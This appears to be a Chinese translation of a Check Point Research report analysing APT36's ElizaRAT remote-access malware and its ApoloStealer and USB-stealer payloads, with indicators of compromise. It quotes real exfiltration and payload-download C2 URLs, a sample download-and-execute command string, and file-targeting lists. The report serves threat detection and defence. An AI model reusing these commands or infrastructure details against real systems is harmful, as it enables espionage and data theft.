南亚

巴基斯坦APT组织APT36的恶意软件ElizaRAT演变分析

介绍

APT36 又名透明部落 (Transparent Tribe),是一个总部位于巴基斯坦的威胁行为者,因持续针对印度政府组织、外交人员和军事设施而臭名昭著。APT36 针对 Windows、Linux 和 Android 系统进行了多次网络间谍活动。

在最近的活动中,APT36 使用了一种特别阴险的 Windows RAT,称为 ElizaRAT。ElizaRAT 于 2023 年首次被发现,经过了重大改进,其逃避技术得到了增强,并保持了其命令和控制 (C2) 通信的可靠性

本报告重点介绍 ElizaRAT 的演变。我们研究了 APT36 使用的各种有效载荷和基础设施以及恶意软件的内部工作原理,包括部署方法、第二阶段有效载荷和对云基础设施的持续使用。

主要发现

  • Check Point Research 正在密切跟踪透明部落 (又名 APT36) 部署的定制植入程序 ElizaRAT 的持续使用情况,该植入程序针对印度知名实体发动了针对性攻击。我们在 2024 年观察到透明部落在印度发动了多次可能成功的攻击活动。
  • 我们对近期活动的分析表明,该恶意软件的逃避技术不断增强,同时引入了一种名为“ApoloStealer”的新窃取负载。
  • ElizaRAT 样本表明系统性地滥用基于云的服务(包括 Telegram、Google Drive 和 Slack)来促进命令和控制通信。

ElizaRAT – 背景和演变

ElizaRAT 于 2023 年 9 月首次公开 披露,是 Transparent Tribe 在针对性攻击中使用的 Windows 远程访问工具 (RAT)。ElizaRAT 感染通常由通过 Google Storage 链接分发的 CPL 文件发起,可能是通过网络钓鱼分发的。ElizaRAT 在其早期变体中使用 Telegram 频道来促进命令和控制 (C2) 通信。

自被发现以来,ElizaRAT 的执行方法、检测规避和 C2 通信都已发展。这在 2023 年底和 2024 年初利用该恶意软件的三次不同活动中显而易见。在每次活动中,攻击者都使用不同的 ElizaRAT 变体来下载自动收集信息的特定第二阶段有效载荷。

ElizaRAT 的主要特点包括:

  • 用.NET 编写并使用 Costura 嵌入.NET 和组装模块。
  • 通过控制面板 (.CPL) 文件执行
  • 使用 Google、Telegram 和 Slack 等云服务进行分发和 C2 通信
  • 投放诱饵文件或视频
  • 在大多数样本中,使用 IWSHshell 创建恶意软件的 Windows 快捷方式
  • 在大多数样本中,使用 SQLite 作为资源,在泄露之前将受害者机器上的文件存储在本地数据库中
  • 生成唯一的受害者 ID,并将其存储在机器上的单独文件中。

图 1-根据恶意软件编译时间戳划分的攻击活动时间线

图 1 – 根据恶意软件编译时间戳划分的攻击活动时间线

Slack 活动

SlackAPI.dll – ElizaRAT

SlackAPI.dll (MD5:  2b1101f9078646482eb1ae497d44104) 是一种 ElizaRAT 变种,利用 Slack 频道作为 C2 基础设施。它于 2023 年底编译,并以 CPL 文件的形式执行。双击即可直接调用 CPL 文件,使鱼叉式网络钓鱼成为一种便捷的感染途径。

Textsource 该变体在异步代码、功能和执行方面与 ElizaRAT 的原始变体最为相似 。它遵循 ElizaRAT 的所有特性和基础创建功能:

  • 生成用户信息文件:在工作目录中创建 Userinfo.dll 文件并以以下方式存储受害者 ID  <username>-<machinename>-<random between 200 to 600>:。
  • 创建工作目录:在 建立一个新目录 %appdata%\SlackAPI
  • 日志记录: 将其操作记录到目录中的文本文件 ( logs.txt)  %appdata%\SlackAPI 。
  • 时区检查: 检查当地时区是否为 India Standard Time
  • 诱饵: 投放一个诱饵 mp4 文件。

为了将受害者注册到攻击者的 C2 中,恶意软件会读取内容 Userinfo.dll 并将其发送到 C2 服务器。然后,恶意软件每 60 秒不断检查 C2 是否有新命令。

它由三类代码组成:

  • CplAppletDelegate – 包括MAIN函数和基本执行过程。
  • Communication – 负责 C2 通信。
  • Controls – 包含恶意软件可以从 C2 接收的每个命令的函数。

从C2接收到的内容由该函数处理 FormatMsgs ,该函数知道如何解析内容并根据 Controls 从C2接收到的命令运行相关函数。

以下是恶意软件可以处理的命令:

命令 描述 功能
files 下载 C2 消息中指定的文件并向 C2 确认下载。 Controls.DownloadFile
screenshot 捕获受感染系统桌面的屏幕截图并将其上传到 C2。 Controls.screenshot
online 将当前用户信息(存储在 Userinfo.dll)发送给C2,确认系统在线。 Controls.online
dir 将受害者机器上指定路径的目录列表发送给 C2。 Controls.DirectoryInfo
upload 将指定文件从受害者的机器上传到 C2。 Controls.Uploadfile
RunFile 执行存储在工作目录中的指定文件。 Controls.RunFile
exit 终止受害者机器上的恶意软件的执行。 Environment.Exit(0)
info 收集并发送详细的系统信息,包括操作系统版本和已安装的防病毒软件。 Controls.Information

SlackAPI.dll 中的 C2 通信通过类进行管理 Communication ,该类使用 Slack 的 API 与攻击者进行交互。该 函数 通过 Slack API ReceiveMsgsInList() 持续轮询频道 ,使用请求中的机器人令牌和受害者 ID 内容。此函数以无限循环运行,每 60 秒检查一次新命令。C06BM9XTVAS``https://slack[.]com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1

对于消息和文件处理,该 SendMsg() 函数通过发布到 向 C2 发送消息 ,https://slack.com/api/chat.postMessage 内容和频道 ID 为 C06BWCMSF1S,同时 SendFile() 使用 将文件上传到同一频道 https://slack.com/api/files.upload。该 DownloadFile() 函数从提供的 URL 检索文件,并使用 和机器人令牌将它们保存到受害者的机器上, HttpClient 以便进行安全访问。

ApoloStealer(SlackFiles.dll)

威胁行为者在特定目标上部署了额外的有效载荷,我们将其命名为 ApoloStealer。根据编译时间,此次活动中使用的 ApoloStealer 变体是在 ElizaRAT SlackAPI.dll 变体编译后一个月进行的,这可能表明其中涉及其他有效载荷。

ApoloStealer 采用与其他 Transparent Tribe 恶意软件类似的技术:

  • 检查当地时区是 India Standard time
  • 工作目录与 SlackAPI.dll – 相同 %appdata%\SlackAPI
  • 包括 SQLite.Interop.dll 作为资源和另外两个用作诱饵的 mp4 文件。
  • 创建一个同名的用户信息文件 appid.dll ,并以类似的方式存储受害者ID  <username>-<machinename>-<random between 500-1000>:。
  • 在攻击者 C2 处注册受害者, http://83.171.248[.]67/suitboot.php并等待响应。
  • 通过创建 LNK 快捷方式 IWSHELL 来运行该文件 rundll
  • 将其所有操作记录在工作目录中创建的本地日志文件中 %appdata%\SlackAPI\rlogs.txt

创建数据库文件后,ApoloStealer 会创建一个表来存储以下字段中的数据:文件名、文件路径、标记、类型和修改日期。然后,该恶意软件会收集所有不以 ~ 或 开头! 且具有以下扩展名之一的 DESKTOP 文件:

.ppt, .pptx, .pptm, .potx, .potm, .pot, .ppsx, .ppsm, .odp, .doc, .docm, .docx, .dot, .dotm, .dotx, .odt, .rtf, .pdf, .xls, .xlsx, .csv, .txt, .zip, .rar, .png, .jpg, .tar, .jpeg, .raw, .svg, .dwg, .heif, .heic, .psd

将所有相关文件存储在数据库文件中后,ApoloStealer 将数据发送到 URL 处的 C2 服务器 http://83.171.248[.]67/oneten.php

该恶意软件对下载目录、OneDrive 目录以及机器上的每个固定驱动器(除外)重复相同的过程 C:\

圈子运动

Circle ElizaRAT 变种于 2024 年 1 月编译,是该恶意软件的改进版本。它利用了一个额外的 dropper 组件,导致检测率大大降低。Circle 活动使用类似于 SlackFiles 有效负载的有效负载,并使用类似的工作目录 ( %appdata%\SlackAPI)。

与其他 ElizaRAT 变种不同,Circle 活动不使用任何云服务作为 C2 基础设施,而是使用简单的虚拟专用服务器 (VPS) 进行 C2 通信。

图 3-循环感染链。

图 3 – 循环感染链。

圆形滴管

该植入器的唯一目的是设置 ElizaRAT 执行的必要条件。该函数 BringCircle 会植入并解压一个嵌入的 zip 文件,其中包含 ElizaRAT 恶意软件。它还会创建工作目录 %appdata%\CircleCpl 并植入诱饵 PDF 文档和 MP4 文件。该恶意软件的另一个功能(ElizaRAT 的一个已知特征)是为该恶意软件创建一个 LNK 文件,但没有迹象表明任何恶意软件使用了该文件。请注意,LNK 的描述是 Slack API File,这也暗示该集群是 Slack 活动的一部分。

图 4 - 使用 WshShell 创建 LNK 文件。

图 4 – 使用 WshShell 创建 LNK 文件。

在植入恶意软件后,植入器会使用一个简单的 Process.start() 功能来执行它。

圆圈 – ElizaRAT

这是 Circle 活动集群中使用的 ElizaRAT 变体。它执行与所有其他变体相同的检查和基础创建:

  • 检查时区是否设置为 India Standard Time
  • 将受害者的信息注册到 %appdata%\CircleCpl由dropper创建的工作目录下的DLL文件中,然后将其内容发送到URL为的攻击者C2  http://38.54.84[.]83/MiddleWare/NewClient
  • 受害者登记发生在两个文件中:
    • Applicationid.dll:存储受害者 ID,该 ID 由随机数(100-1000)、用户名和机器名(<random 100-1000>-<username>-<machinename>)组成,与其他 ElizaRAT 变种类似。
    • Applicationinfo.dll:以 格式存储受害者详细信息 {machinename}>{username}>{IP}>{OS}>{machinetype}
  • 通过访问 URL 检索受害者的 IP 地址 https://check.torproject.org/api/ip,最有可能识别受害者的出站 IP 地址。

为了从攻击者那里获取新任务,恶意软件会将 的内容 ( 在字符串开头 applicationid.dll添加 )发送到 URL 并等待响应。x002>``http://38.54.84[.]83/MiddleWare/GetTask

恶意软件可以从攻击者那里接收三项任务:

  • at>{URI} – 在这种情况下,恶意软件 DownloadFile() 会触发该功能,从 URL 下载文件 http://38.54.84[.]83/uploads/{URI}
  • in>{URL} – 恶意软件触发该 DownloadFile() 功能,从给定的 URL 下载文件。
  • NA>NA – 恶意软件休眠2分钟,然后 Awake() 再次触发该功能。

图 5-恶意软件通信的 HTTP 流示例。

图 5 – 恶意软件通信的 HTTP 流示例。

如果恶意软件触发该 DownloadFile() 功能,它也会触发 ExtractFile() 用于解压 zip 文件的功能。

图6-ExtractFile()函数。

图6 – ExtractFile() 函数。

该 zip 文件包含 SQLite DLL,它将用于第二阶段的有效负载。它被解压到与%appdata%\SlackAPISlack 活动相同的工作目录。如果我们检查该 RunFile() 函数,我们可以看到它被指定用于执行 SlackFiles.dll 窃取程序。

图 7 - RunFile() 函数。sfdll 变量等于 SlackFiles.dll。

图 7 – RunFile() 函数。sfdll 变量等于 SlackFiles.dll。

该恶意软件被指定下载 SlackFiles.dll 有效负载并使用与 Slack 活动相同的工作目录,这一事实表明这两个活动集群是同一活动的一部分。

Google Drive 活动

此次攻击活动中使用的初始感染媒介尚不清楚。但是,根据文件名(例如 Amended Copy.cpl 和 Threat Alert 1307-JS-9.pdf issued vide NATRAD note number 2511 CLKj dated 10 Aug 2024 in aspect of exercise Tarang Shakti-2024.pdf.cpl)以及威胁行为者过去的攻击活动,它们可能是通过鱼叉式网络钓鱼发送的。

图 8-基于 Google Drive 的攻击活动感染链。

图 8 – 基于 Google Drive 的攻击活动感染链。

与以前的版本非常相似,CPL 文件是一个投放器,负责设置下一阶段的所有必需品,其中包括:

  • 创建工作目录 ApplicationData\BaseFilteringEngine
  • 登记受害者
  • 通过计划任务建立持久性
  • 删除 ElizaRAT 文件,包括诱饵 PDF、X.509 证书和主要 ElizaRAT 变体(BaseFilterEngine.dll

指挥与控制

此次活动中使用的 ElizaRAT 变体利用 Google Cloud 进行 C2 通信。利用 Google C2 通道,攻击者发送命令从不同的虚拟专用服务器 (VPS) 下载下一阶段的有效负载。在此次活动中,我们观察到使用了三个不同的 VPS。

主要的 ElizaRAT 恶意软件 ( baseFilteringEngine.dll) 使用 X.509 证书创建一个用于 ServiceAccountCredential 验证 Google Cloud Storage 服务帐户的对象:  xijinping@round-catfish-416409.iam.gserviceaccount.com。与此服务帐户关联的电子邮件是 fikumatry@gmail.com 。该恶意软件会检查父文件夹 1Gwy3yPyyYJVoOvCMfsmhhCknC-tiuNFv 并列出该文件夹中的所有文件。接下来,它会找到相关受害者的 tmp1 文件,获取命令并记录其操作。

该恶意软件唯一可以处理的命令是命令 Transfer ,该命令指示恶意软件从特定的 VPS 地址下载有效负载。以下是该恶意软件针对选定受害者收到的命令的示例格式:

Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip:!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB

恶意软件将命令拆分 :! 为一个数组,其中每个元素代表操作的特定参数:

数组[0] 要执行的操作:“转移”
数组[1] 下载网址。
数组[2] 执行文件(父文件)的进程。
数组[3] 文件名。
数组[4] 文件名。
数组[5] 要执行的函数。
数组[6] 邮政编码密码。
数组[7] 要创建并存储的文件夹的名称。

处理命令时,会触发以下序列:

  1. 已按指定方式创建文件夹。
  2. 该函数 DownloadProtection 使用从指定的 URL 下载文件 HttpWebRequest 到工作文件夹中具有指定名称的文件。
  3. 该函数 Withdraw 使用提供的密码提取接收到的文件。
  4. 该函数 BetaDrum 创建一个计划任务,每 5 分钟运行一次具有提供的父文件。
  5. 向服务器发送一条消息,表明操作成功。

有效载荷 - Google Drive 攻击活动

到目前为止,我们已经看到此活动使用了两种有效载荷: extensionhelper_64.dll 和 ConnectX.dll。这两种有效载荷都用作信息窃取程序,每种都为特定目的而设计。尽管这些变化很小,但有效载荷的核心功能和主要目的在整个活动中始终保持一致。

ApoloStealer (窃取扩展帮助器_64)

该 文件以 或 的形式 extensionhelper_64.dll 下载到受害者的机器上  ,并由计划任务执行,该计划  任务通过 运行该函数 。此有效负载是一个文件窃取程序,可收集特定文件类型,将其元数据存储在数据库中,并将其泄露到 C2 服务器。SpotifyAB.dll``Spotify-news.dll``Mean``rundll32.exe

DBmanager 首先,恶意软件会创建一个 SQLite 数据库文件,该文件会使用类和 进行交互 SQLite.Interop.dll。SQLite DLL 嵌入在恶意软件受保护的 zip 文件中,恶意软件会使用纯文本密码提取该文件。

在迭代固定驱动器上的所有文件时,恶意软件会跳过诸如 Program Files、、 Windows和 之类的目录ProgramData, AppData 以避免处理系统目录。它还会过滤掉以 $、 .或 开头的文件~,这些文件通常是系统文件或临时文件。该恶意软件只对这些文件后缀感兴趣:

.xla .xlam .xll .xlm .xlsm .xlt .xltm .xltx .dif .xls .xlsx .ppt .pptx .pot .potm .potx .ppam .pps .ppsm .ppsx .pptm .pub .rtf .sldm .sldx .pdf .jpg .png .jpeg .odf .odg .zip .csv .xlc .rar .tar

isUploaded 恶意软件存储每个相关文件的 名称、路径和另一个调用的参数 。isUploaded 是一个布尔变量,表示文件是否已上传到 C2。如果文件未上传到 C2,恶意软件将调用该 sendRequest 函数,该函数读取文件的字节内容并将其发送到 C2,同时更新其上传状态。

与此活动中的其他恶意软件一样,它也将部分操作隐藏在文本块中,并用 ‘ ‘ 空格分隔。它试图隐藏的信息包括其 C2 服务器和与之通信的不同网页,即使它们最终不会使用:

图 9-用于隐藏有效载荷中的某些字符串的文本块,以空格分隔。

图 9 – 用于隐藏有效载荷中的某些字符串的文本块,以空格分隔。

ConnectX – USB窃取程序

额外的有效载荷旨在检查外部驱动器(例如 USB)上的文件。此恶意软件利用 WMI(Windows 管理规范)列出外部驱动器上的所有相关文件,并以相同的文件扩展名作为目标。但是,它不是将它们存储在数据库中,而是将它们存储在它在 BaseFilteringEngine 工作目录中创建的存档中。

该恶意软件使用 WMI 每两秒监控一次新磁盘驱动器的创建,最有可能检测到 USB 驱动器的插入:

SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA 'Win32_DiskDrive'

对于每个设备,它会检索设备 ID 和序列号,并检查要迭代的正确磁盘分区。与其他与 ElizaRAT 相关的窃取程序不同,ConnectX 没有 C2 服务器来窃取数据;它只是将数据存储在 ElizaRAT 工作目录 %appdata%\BaseFilteringEngine 中的 zip 文件中。

归因

ElizaRAT 是一款定制工具,据悉“透明部落”专门使用这款工具来针对与本报告中所述类似的目标。此外,还有与该组织活动相关的其他指标,包括在针对 Linux 系统的不同活动集群中使用重叠的电子邮件帐户。

与 Transparent Tribe 相关的其他恶意软件一样,这里介绍的所有样本都使用了名称Apolo Jones。在 Google Drive 活动中,诱饵 PDF 文件将其作者归为 Apolo Jones,这是之前在 Transparent Tribe 运营的各个方面观察到的独特名称。

图 10 -ElizaRAT 诱饵 PDF 元数据。

图 10 -ElizaRAT 诱饵 PDF 元数据。

在不同的攻击活动中,的使用方式 Apolo Jones 有所不同。例如,在 Circle dropper 中, 密码 ApoloJones2024 用于解压 zip 文件。此外,  SlackFiles.dll payload 中负责检查时区的函数也被称为 ApoloJones

受害者学

ElizaRAT 变体执行的内部检查表明,该活动专门针对印度系统,每个恶意软件变体的初始功能都是验证系统时区是否设置为,这证明了这一点 'India Standard Time’

图 11 - SlackFiles.dll 有效负载中的时区检查示例。此功能出现在所有样本中。

图 11 – SlackFiles.dll 有效负载中的时区检查示例。此功能出现在所有样本中。

结论

ElizaRAT 的发展反映了 APT36 刻意增强其恶意软件以更好地逃避检测并有效瞄准印度实体的努力。通过将 Google Drive、Telegram 和 Slack 等云服务集成到其命令和控制基础设施中,他们利用常用平台在常规网络流量中掩盖其活动。

引入 ApolloStealer 等新载荷标志着 APT36 恶意软件库的显著扩展,表明该组织正在采用更灵活、模块化的载荷部署方法。这些方法主要侧重于数据收集和泄露,凸显了他们对情报收集和间谍活动的持续重视。

 

IOCs

Files

Type Value Description
MD5 730f708f2788fc83e15e93edd89f8c59 ElizaRAT Dropper
BaseFilter.dll
(amended copy.cpl)
SHA1 549d80d0d2c3e2cf3ea530f37bfc0b9fe0cbd5f4
SHA256 06d9662572a47d31a51adf1e0085278e0233e4299e0d7477e5e4a3a328dea9d1
MD5 0cd16d0a2768b9ec0d980ccf875b2724 ElizaRAT
BaseFilteringEngine.dll
SHA1 88fd8d71d879257b6cbf2bc12b6493771b26d8a0
SHA256 a7fd97177186aff9f442beb9da6b1ab3aff47e611b94609404e755dd2f97dce8
MD5 0673341ccceeace3f0b268488f05db80 ElizaRAT Dropper
BaseFilter.dll
(Tarang Shakti)
SHA1 bc62b98437abd81a1471633afb9cff5dd898cdf8
SHA256 70bafcf666e8e821212f55ea302285bb860d2b7c18089592a4a093825adbaa71
MD5 2b1101f9078646482eb1ae497d44104c ElizaRAT
SlackAPI.dll
SHA1 6ac91c9e6beeacd74c56dfde9025e54e221b016c
SHA256 60b0b6755cf03ea8f6748a1e8b74a80a3d7637c986df64ee292f5ffefcd610a2
MD5 795d1be0915ec60c764b7a7aa6c54334 ElizaRAT Dropper
circledrop.cpl
SHA1 86afc3e8046dfff3ec06bd50ae38f1da7797c3e2
SHA256 7e04e62f337c5059757956594b703fc1a995d436c48efa17c45eb0f80af8a890
MD5 8703b910ece27b578f231ce5eb1afd8f ElizaRAT
Circle.cpl
SHA1 f7424286b6b5f8dbad86856ef178745e34c8e83a
SHA256 2b6a273eae0fb1835393aea6c30521d9bf5e27421c2933bfb3beee8c5b27847e
MD5 009cb6da5c4426403b82c79adf67021c ApoloStealer
SlackFiles.dll
SHA1 f98019e637a2ae58d54ff903770b35eefb106432
SHA256 d66ba4ee97a2f42d85ca383f3f61a2fac4f0b374aad1337f5f29245242f2d990
MD5 3a2c701408d94bbcdcf954793f6749bc ApoloStealer
SpotifyAB.dll
SHA1 0db24c0a4dd12e5fa412434222d81de8e2de4b3c
SHA256 dca78e069bfd9ca4638b4f9cb21dff721530d16924e502c03d8c9aa334b7ca0d
MD5 1bac7ea5a9558d937eaf0682523e6a06 ApoloStealer
Spotify-News.dll
SHA1 b7814d9f6f2096f5a9573ade52547a447eff33bb
SHA256 348c0980c61d7c682cce7521aaad13a20732f7115cb5559729b86ca255f1af7f
MD5 d3fe72a3b9cb5055662e6a0e19b8f010 ApoloStealer
Spotify-Desk.dll
SHA1 c4c9aaeb74782cd9b5b8701d46e55cf299277215
SHA256 6f839ded49ebf1dad014d79fbab396e2067c487685556a8402f3acdeb1600d98
MD5 b54512bf0ed75a9f2dee26a4166461a2 USB Stealer
EmergencyBackup.dll
SHA1 b09d059e8d6b87f3a6165e4d71901187d0aa99d5
SHA256 0a52c0ac04251ac1a8bc193af47f33136ae502b0c237de5236d1136acc3b1140
MD5 ab127d76a40f1cb0cfd81ba1e786d983 USB Stealer
ConnectX.dll
SHA1 115e612a4e653cd915d5fc07246a00369fe38cde
SHA256 b41e1d6340388b08694ae649a54fa09372f92f4038fd84259a06716fa706b967
MD5 b9d9e75a2e6b81277f2052a1f0b14e45 ElizaRAT Dropper
Award Verification to Air Cmde GS Matharu.cpl
SHA1 1fc28b9e902dd2a8b771b1dc7ec3a62ad04fb02b
SHA256 6296fb22d94d1956fda2a6a48b36e37ddd15cf196c434ab409c787bf8aa47ac3
MD5 58643299e340ae7b01efc67ef09ed369 ElizaRAT
WordDocument.cpl
SHA1 e5377172ee4bae1508405370ee41bee646837c04
SHA256 263f9e965f4f0d042537034e33699cf6d852fb8a52ac320a0e964ce96c48f5e5
MD5 16ea7ce77c875a17049e9607323d1be4 Persistence tool
Aboutus.dll
SHA1 0c9400e6b8c9244fd187a9f021d0da0b70b6f6fd
SHA256 8d552547fe045f6006f113527eb5dd4a8d5918c989bf11090c7cb44806d595be
MD5 47990d1df44767ee3a6c4a6673ee76e9 USB Stealer
DonateUS.dll
SHA1 43ac372b9cd05eefae3f50a0e487562759f3b0d9
SHA256 308c84c68c18af8458ae61afe1f2eec78f229e188724e271bd192a144fd582fc
MD5 7ecaa3c5a647d671a9aa4369d4a43b83 ElizaRAT Dropper
Profile Verificition for Award.cpl WordDocument.dll
SHA1 ee3162e649183490038da015e51750f23ae18d0f
SHA256 b9e10e83a270e1995acaceb88ce684fb97df6156a744565b20b6ec3bc08c2728
MD5 af2ec3dcfdbb7771b0a7a3d2035e7e99 ElizaRAT
WordDocument.cpl
SHA1 2e8139275a48cd048c21e1942b673ae0781dd0b8
SHA256 b30a9e31b0897bfe6ab80aebcd0982eecf68e9d3d3353c1e146f72195cef0ef5

Network

Type Value Description
IP 84.247.135[.]235 C2 server – Google Drive campaign
IP 143.110.179[.]176 C2 server – Google Drive campaign
IP 64.227.134[.]248 C2 server – Google Drive campaign
IP 38.54.84[.]83 C2 server – Circle campaign
IP 83.171.248[.]67 C2 server – Slack campaign

相关文章

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

返回顶部按钮